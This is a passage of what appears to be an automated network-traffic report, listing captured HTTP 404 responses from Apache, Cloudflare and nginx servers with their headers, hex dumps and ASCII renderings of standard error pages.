                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:51:39 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:51:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:51:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:51:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:52:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H5P8%2Bt%2FBRk98M2pup3d%2BCsjvYqYTE%2BjDjrlCM2SvkzoaX1tHSMmDiEEV4hAfma9Ll3M3hMVMr5sk0rTE6f4t9fg19QV8BptutSmr0aFOUD1U7ojuw3j%2B6wIsKGAahLH%2B%2BFPAdHCJyq5pnLUU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb96a06fc80f46-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1700&rtt_var=850&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 d8 fc 81 9c 88 49 d4 4d a2 a7 32 a7 f3 01 73 3a ef a6 f3 Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:52:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bz%2Fr7hIiGMqs1GErY73nJpl5Lf88jiKZHOv3R7MUmwkKHxxHhzT3C5Ax1jqxO%2Bq8zU1btX5HyqRE1%2FfDonpUQOXH7qq3Xn3CytqtYooCbkjjvndM1jrEhJZMPDnATpyD9Ui9FWlTM9P6bejJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb96b11bb842a0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1738&rtt_var=869&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 d8 fc 81 9c 88 49 d4 4d a2 a7 32 a7 f3 01 73 3a ef a6 f3 a7 32 e7 b3 01 73 3e eb Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:52:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8eWob8r6a%2B55cpwZ%2BltXNT6hTHR3GJj45T%2F5P%2FcT%2BfijU9y9Hm4fHcXIdDHdqjoRJgEA2d7pnlNaVm7YiVtI%2BkMMDhSxWj4X0TAAPA0c0yczfBGG8cm9o%2FsFxgZ5g5eWJj3UQgA2DqEKefqW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb96c20a374369-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2459&min_rtt=2459&rtt_var=1229&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10880&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 d8 fc 81 9c 88 49 d4 4d a2 a7 32 a7 f3 01 73 Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 11:52:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1mdB9%2FHMPu2jvQpp4Ko2FVk%2B3wGJaq0RaGC6QZWTT0v4mrzR%2BITXBDVQZNvA0f6qd23mLiqqNbVonFMEM30IsQ4045EZpI%2BhJY%2FWhcdawJaxiauOVj1vpUASfTvIWWPvDyZ8Of7Elq2vmhsJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecb96d288b5c461-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1467&rtt_var=733&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=492&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c Data Ascii: 939<!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</titl
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 11:52:23 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 11:52:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 11:52:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 11:52:31 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 11:52:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 11:52:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Dec 2024 11:52:44 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
